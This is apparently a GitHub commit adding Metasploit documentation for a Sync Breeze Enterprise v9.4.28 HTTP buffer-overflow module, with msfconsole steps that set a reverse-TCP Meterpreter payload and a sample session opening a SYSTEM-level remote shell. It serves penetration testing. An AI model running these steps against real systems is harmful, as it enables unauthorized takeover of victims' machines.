Skip to content

Commit 57eac49

Browse files
Add files via upload
1 parent cd038ae commit 57eac49

File tree

1 file changed

+74
-0
lines changed

1 file changed

+74
-0
lines changed
Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
## Vulnerable Application
2+
3+
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
4+
5+
## Verification Steps
6+
1. Install a vulnerable Sync Breeze Enterprise
7+
2. Start `Sync Breeze Enterprise` service
8+
3. Start `Sync Breeze Enterprise` client application
9+
4. Navigate to `Tools` > `Sync Breeze Options` > `Server`
10+
5. Check `Enable Web Server On Port 80` to start the web interface
11+
6. Start `msfconsole`
12+
7. Do `use exploit/windows/http/syncbreeze_bof`
13+
8. Do `set RHOST ip`
14+
9. Do `check`
15+
10. Verify the target is vulnerable
16+
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
17+
12. Do `set LHOST ip`
18+
13. Do `exploit`
19+
14. Verify the Meterpreter session is opened
20+
21+
## Scenarios
22+
23+
###Sync Breeze Enterprise v9.4.28 on Windows 7 SP1
24+
25+
```
26+
27+
msf exploit(syncbreeze_bof) > show options
28+
29+
Module options (exploit/windows/http/syncbreeze_bof):
30+
31+
Name Current Setting Required Description
32+
---- --------------- -------- -----------
33+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
34+
RHOST 192.168.2.10 yes The target address
35+
RPORT 80 yes The target port
36+
SSL false no Negotiate SSL/TLS for outgoing connections
37+
VHOST no HTTP server virtual host
38+
39+
40+
Payload options (windows/meterpreter/reverse_tcp):
41+
42+
Name Current Setting Required Description
43+
---- --------------- -------- -----------
44+
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
45+
LHOST 192.168.2.187 yes The listen address
46+
LPORT 4444 yes The listen port
47+
48+
49+
Exploit target:
50+
51+
Id Name
52+
-- ----
53+
0 Sync Breeze Enterprise v9.4.28
54+
55+
56+
msf exploit(syncbreeze_bof) > exploit
57+
58+
[*] Started reverse TCP handler on 192.168.2.187:4444
59+
[*] Sending request...
60+
[*] Sending stage (957427 bytes) to 172.16.0.18
61+
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-05-16 11:00:25 +0100
62+
63+
meterpreter > getuid
64+
Server username: NT AUTHORITY\SYSTEM
65+
meterpreter > sysinfo
66+
Computer : PC-01
67+
OS : Windows 7 (Build 7600).
68+
Architecture : x86
69+
System Language : pt_PT
70+
Domain : LAB
71+
Logged On Users : 3
72+
Meterpreter : x86/windows
73+
meterpreter >
74+
```

0 commit comments

Comments
 (0)